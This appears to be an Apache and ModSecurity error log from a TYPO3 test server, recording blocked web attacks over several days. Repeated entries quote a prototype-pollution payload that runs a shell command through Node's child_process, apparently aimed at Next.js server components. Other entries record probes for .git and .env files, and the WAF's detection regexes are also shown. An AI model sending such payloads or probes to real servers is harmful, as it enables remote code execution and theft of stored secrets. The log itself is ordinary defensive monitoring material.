[Sat Mar 07 23:00:38.704801 2026] [:error] [pid 2530090] [client 54.153.10.186:39676] [client 54.153.10.186] ModSecurity: Warning. Pattern match "(?i)[\\\\s\\\\S]((?:x(?:link:href|html|mlns)|!ENTITY.*?(?:SYSTEM|PUBLIC)|data:text\\\\/html|formaction|\\\\@import|base64)\\\\b|pattern\\\\b.*?=)" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "149"] [id "941130"] [msg "XSS Filter - Category 3: Attribute Vector"] [data "Matched Data: base64 found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x22then\\x22:\\x22$B1337\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271)) | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22, \\x22_chunks\\x22: \\x22$Q2\\x22, \\x22_formData\\x22: ..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS"] [tag "OWASP_CRS/W [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aaygBqZMpHjtpPWB_zsfogAAAAA"]
[Sat Mar 07 23:00:38.705645 2026] [:error] [pid 2530090] [client 54.153.10.186:39676] [client 54.153.10.186] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aaygBqZMpHjtpPWB_zsfogAAAAA"]
[Sat Mar 07 23:00:38.705786 2026] [:error] [pid 2530090] [client 54.153.10.186:39676] [client 54.153.10.186] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=5,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aaygBqZMpHjtpPWB_zsfogAAAAA"]
[Sat Mar 07 23:00:38.867519 2026] [:error] [pid 2530090] [client 54.153.10.186:39676] [client 54.153.10.186] ModSecurity: Warning. Pattern match "(?:\\\\$(?:\\\\((?:\\\\(.*\\\\)|.*)\\\\)|\\\\{.*\\\\})|[<>]\\\\(.*\\\\))" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "372"] [id "932130"] [msg "Remote Command Execution: Unix Shell Expression Found"] [data "Matched Data: $((41*271)) found within ARGS:0: {then: $1:__proto__:then status: resolved_model reason: -1 value: {then:$b1337} _response: {_prefix: var res=process.mainmodule.require(child_process).execsync(echo $((41*271)) | base64 -w 0).tostring().trim() throw object.assign(new error(next_redirect) {digest: `next_redirect push/login?a=${res} 307 `}) _chunks: $q2 _formdata: {get: $1:constructor:constructor}}}"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-shell"] [tag "platform-unix"] [tag "attack-rce"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aaygBqZMpHjtpPWB_zsfowAAAAA"]
[Sat Mar 07 23:00:38.868028 2026] [:error] [pid 2530090] [client 54.153.10.186:39676] [client 54.153.10.186] ModSecurity: Warning. Pattern match "(?i)[\\\\s\\\\S]((?:x(?:link:href|html|mlns)|!ENTITY.*?(?:SYSTEM|PUBLIC)|data:text\\\\/html|formaction|\\\\@import|base64)\\\\b|pattern\\\\b.*?=)" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "149"] [id "941130"] [msg "XSS Filter - Category 3: Attribute Vector"] [data "Matched Data: base64 found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x22then\\x22:\\x22$B1337\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271)) | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22, \\x22_chunks\\x22: \\x22$Q2\\x22, \\x22_formData\\x22: ..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS"] [tag "OWASP_CRS/W [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aaygBqZMpHjtpPWB_zsfowAAAAA"]
[Sat Mar 07 23:00:38.869096 2026] [:error] [pid 2530090] [client 54.153.10.186:39676] [client 54.153.10.186] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aaygBqZMpHjtpPWB_zsfowAAAAA"]
[Sat Mar 07 23:00:38.869239 2026] [:error] [pid 2530090] [client 54.153.10.186:39676] [client 54.153.10.186] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=5,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aaygBqZMpHjtpPWB_zsfowAAAAA"]
[Mon Mar 09 14:59:32.455234 2026] [authz_core:error] [pid 2576105] [client 192.253.248.12:46608] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git, referer: http://surf.test.indacotrentino.com//.git/HEAD
[Mon Mar 09 22:55:34.524689 2026] [:error] [pid 2580319] [client 216.73.216.86:11783] [client 216.73.216.86] ModSecurity: Warning. Pattern match "^$" at REQUEST_HEADERS:user-agent. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "628"] [id "920330"] [msg "Empty User Agent Header"] [severity "NOTICE"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EMPTY_HEADER_UA"] [hostname "surf.test.indacotrentino.com"] [uri "/robots.txt"] [unique_id "aa9B1iEftKNqPVpEllxUewAAAAU"]
[Mon Mar 09 23:49:26.350650 2026] [:error] [pid 2576083] [client 3.86.40.61:60672] [client 3.86.40.61] ModSecurity: Warning. Pattern match "(?:\\\\$(?:\\\\((?:\\\\(.*\\\\)|.*)\\\\)|\\\\{.*\\\\})|[<>]\\\\(.*\\\\))" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "372"] [id "932130"] [msg "Remote Command Execution: Unix Shell Expression Found"] [data "Matched Data: $((41*271)) found within ARGS:0: {then: $1:__proto__:then status: resolved_model reason: -1 value: {then:$b1337} _response: {_prefix: var res=process.mainmodule.require(child_process).execsync(echo $((41*271)) | base64 -w 0).tostring().trim() throw object.assign(new error(next_redirect) {digest: `next_redirect push/login?a=${res} 307 `}) _chunks: $q2 _formdata: {get: $1:constructor:constructor}}}"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-shell"] [tag "platform-unix"] [tag "attack-rce"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aa9OdjjVA7cxrnk90gj2qQAAABU"]
[Mon Mar 09 23:49:26.351080 2026] [:error] [pid 2576083] [client 3.86.40.61:60672] [client 3.86.40.61] ModSecurity: Warning. Pattern match "(?i)[\\\\s\\\\S]((?:x(?:link:href|html|mlns)|!ENTITY.*?(?:SYSTEM|PUBLIC)|data:text\\\\/html|formaction|\\\\@import|base64)\\\\b|pattern\\\\b.*?=)" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "149"] [id "941130"] [msg "XSS Filter - Category 3: Attribute Vector"] [data "Matched Data: base64 found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x22then\\x22:\\x22$B1337\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271)) | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22, \\x22_chunks\\x22: \\x22$Q2\\x22, \\x22_formData\\x22: ..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS"] [tag "OWASP_CRS/W [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aa9OdjjVA7cxrnk90gj2qQAAABU"]
[Mon Mar 09 23:49:26.351907 2026] [:error] [pid 2576083] [client 3.86.40.61:60672] [client 3.86.40.61] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aa9OdjjVA7cxrnk90gj2qQAAABU"]
[Mon Mar 09 23:49:26.352055 2026] [:error] [pid 2576083] [client 3.86.40.61:60672] [client 3.86.40.61] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=5,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aa9OdjjVA7cxrnk90gj2qQAAABU"]
[Mon Mar 09 23:49:26.452265 2026] [:error] [pid 2576083] [client 3.86.40.61:60672] [client 3.86.40.61] ModSecurity: Warning. Pattern match "(?:\\\\$(?:\\\\((?:\\\\(.*\\\\)|.*)\\\\)|\\\\{.*\\\\})|[<>]\\\\(.*\\\\))" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "372"] [id "932130"] [msg "Remote Command Execution: Unix Shell Expression Found"] [data "Matched Data: $((41*271)) found within ARGS:0: {then: $1:__proto__:then status: resolved_model reason: -1 value: {then:$b1337} _response: {_prefix: var res=process.mainmodule.require(child_process).execsync(echo $((41*271)) | base64 -w 0).tostring().trim() throw object.assign(new error(next_redirect) {digest: `next_redirect push/login?a=${res} 307 `}) _chunks: $q2 _formdata: {get: $1:constructor:constructor}}}"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-shell"] [tag "platform-unix"] [tag "attack-rce"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aa9OdjjVA7cxrnk90gj2qgAAABU"]
[Mon Mar 09 23:49:26.452745 2026] [:error] [pid 2576083] [client 3.86.40.61:60672] [client 3.86.40.61] ModSecurity: Warning. Pattern match "(?i)[\\\\s\\\\S]((?:x(?:link:href|html|mlns)|!ENTITY.*?(?:SYSTEM|PUBLIC)|data:text\\\\/html|formaction|\\\\@import|base64)\\\\b|pattern\\\\b.*?=)" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "149"] [id "941130"] [msg "XSS Filter - Category 3: Attribute Vector"] [data "Matched Data: base64 found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x22then\\x22:\\x22$B1337\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271)) | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22, \\x22_chunks\\x22: \\x22$Q2\\x22, \\x22_formData\\x22: ..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS"] [tag "OWASP_CRS/W [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aa9OdjjVA7cxrnk90gj2qgAAABU"]
[Mon Mar 09 23:49:26.453756 2026] [:error] [pid 2576083] [client 3.86.40.61:60672] [client 3.86.40.61] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aa9OdjjVA7cxrnk90gj2qgAAABU"]
[Mon Mar 09 23:49:26.453894 2026] [:error] [pid 2576083] [client 3.86.40.61:60672] [client 3.86.40.61] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=5,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aa9OdjjVA7cxrnk90gj2qgAAABU"]
[Tue Mar 10 01:21:09.630502 2026] [:error] [pid 2594247] [client 98.87.157.39:53072] [client 98.87.157.39] ModSecurity: Warning. Pattern match "(?:\\\\$(?:\\\\((?:\\\\(.*\\\\)|.*)\\\\)|\\\\{.*\\\\})|[<>]\\\\(.*\\\\))" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "372"] [id "932130"] [msg "Remote Command Execution: Unix Shell Expression Found"] [data "Matched Data: $((41*271)) found within ARGS:0: {then: $1:__proto__:then status: resolved_model reason: -1 value: {then:$b1337} _response: {_prefix: var res=process.mainmodule.require(child_process).execsync(echo $((41*271)) | base64 -w 0).tostring().trim() throw object.assign(new error(next_redirect) {digest: `next_redirect push/login?a=${res} 307 `}) _chunks: $q2 _formdata: {get: $1:constructor:constructor}}}"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-shell"] [tag "platform-unix"] [tag "attack-rce"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aa9j9Y77wN0CJzgriQe1jQAAAAE"]
[Tue Mar 10 01:21:09.630953 2026] [:error] [pid 2594247] [client 98.87.157.39:53072] [client 98.87.157.39] ModSecurity: Warning. Pattern match "(?i)[\\\\s\\\\S]((?:x(?:link:href|html|mlns)|!ENTITY.*?(?:SYSTEM|PUBLIC)|data:text\\\\/html|formaction|\\\\@import|base64)\\\\b|pattern\\\\b.*?=)" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "149"] [id "941130"] [msg "XSS Filter - Category 3: Attribute Vector"] [data "Matched Data: base64 found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x22then\\x22:\\x22$B1337\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271)) | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22, \\x22_chunks\\x22: \\x22$Q2\\x22, \\x22_formData\\x22: ..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS"] [tag "OWASP_CRS/W [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aa9j9Y77wN0CJzgriQe1jQAAAAE"]
[Tue Mar 10 01:21:09.631813 2026] [:error] [pid 2594247] [client 98.87.157.39:53072] [client 98.87.157.39] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aa9j9Y77wN0CJzgriQe1jQAAAAE"]
[Tue Mar 10 01:21:09.631966 2026] [:error] [pid 2594247] [client 98.87.157.39:53072] [client 98.87.157.39] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=5,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aa9j9Y77wN0CJzgriQe1jQAAAAE"]
[Tue Mar 10 01:21:09.736704 2026] [:error] [pid 2594247] [client 98.87.157.39:53072] [client 98.87.157.39] ModSecurity: Warning. Pattern match "(?:\\\\$(?:\\\\((?:\\\\(.*\\\\)|.*)\\\\)|\\\\{.*\\\\})|[<>]\\\\(.*\\\\))" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "372"] [id "932130"] [msg "Remote Command Execution: Unix Shell Expression Found"] [data "Matched Data: $((41*271)) found within ARGS:0: {then: $1:__proto__:then status: resolved_model reason: -1 value: {then:$b1337} _response: {_prefix: var res=process.mainmodule.require(child_process).execsync(echo $((41*271)) | base64 -w 0).tostring().trim() throw object.assign(new error(next_redirect) {digest: `next_redirect push/login?a=${res} 307 `}) _chunks: $q2 _formdata: {get: $1:constructor:constructor}}}"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-shell"] [tag "platform-unix"] [tag "attack-rce"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aa9j9Y77wN0CJzgriQe1jgAAAAE"]
[Tue Mar 10 01:21:09.737191 2026] [:error] [pid 2594247] [client 98.87.157.39:53072] [client 98.87.157.39] ModSecurity: Warning. Pattern match "(?i)[\\\\s\\\\S]((?:x(?:link:href|html|mlns)|!ENTITY.*?(?:SYSTEM|PUBLIC)|data:text\\\\/html|formaction|\\\\@import|base64)\\\\b|pattern\\\\b.*?=)" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "149"] [id "941130"] [msg "XSS Filter - Category 3: Attribute Vector"] [data "Matched Data: base64 found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x22then\\x22:\\x22$B1337\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271)) | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22, \\x22_chunks\\x22: \\x22$Q2\\x22, \\x22_formData\\x22: ..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS"] [tag "OWASP_CRS/W [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aa9j9Y77wN0CJzgriQe1jgAAAAE"]
[Tue Mar 10 01:21:09.738208 2026] [:error] [pid 2594247] [client 98.87.157.39:53072] [client 98.87.157.39] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aa9j9Y77wN0CJzgriQe1jgAAAAE"]
[Tue Mar 10 01:21:09.738395 2026] [:error] [pid 2594247] [client 98.87.157.39:53072] [client 98.87.157.39] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=5,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aa9j9Y77wN0CJzgriQe1jgAAAAE"]
[Tue Mar 10 22:32:52.268995 2026] [:error] [pid 2606453] [client 93.123.109.214:54856] [client 93.123.109.214] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "abCOBIXIua_918bNo_TL6AAAAAk"]
[Tue Mar 10 22:32:52.269175 2026] [:error] [pid 2606453] [client 93.123.109.214:54856] [client 93.123.109.214] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "abCOBIXIua_918bNo_TL6AAAAAk"]
[Tue Mar 10 22:32:52.269310 2026] [:error] [pid 2606453] [client 93.123.109.214:54856] [client 93.123.109.214] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "abCOBIXIua_918bNo_TL6AAAAAk"]
[Tue Mar 10 22:32:52.297190 2026] [:error] [pid 2606453] [client 93.123.109.214:54856] [client 93.123.109.214] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "abCOBIXIua_918bNo_TL6QAAAAk"]
[Tue Mar 10 22:32:52.297358 2026] [:error] [pid 2606453] [client 93.123.109.214:54856] [client 93.123.109.214] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "abCOBIXIua_918bNo_TL6QAAAAk"]
[Tue Mar 10 22:32:52.297488 2026] [:error] [pid 2606453] [client 93.123.109.214:54856] [client 93.123.109.214] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "abCOBIXIua_918bNo_TL6QAAAAk"]
[Tue Mar 10 22:32:52.320132 2026] [authz_core:error] [pid 2606453] [client 93.123.109.214:54856] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.env.bak
[Tue Mar 10 22:32:52.390179 2026] [:error] [pid 2606453] [client 93.123.109.214:54856] [client 93.123.109.214] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.save"] [unique_id "abCOBIXIua_918bNo_TL6wAAAAk"]
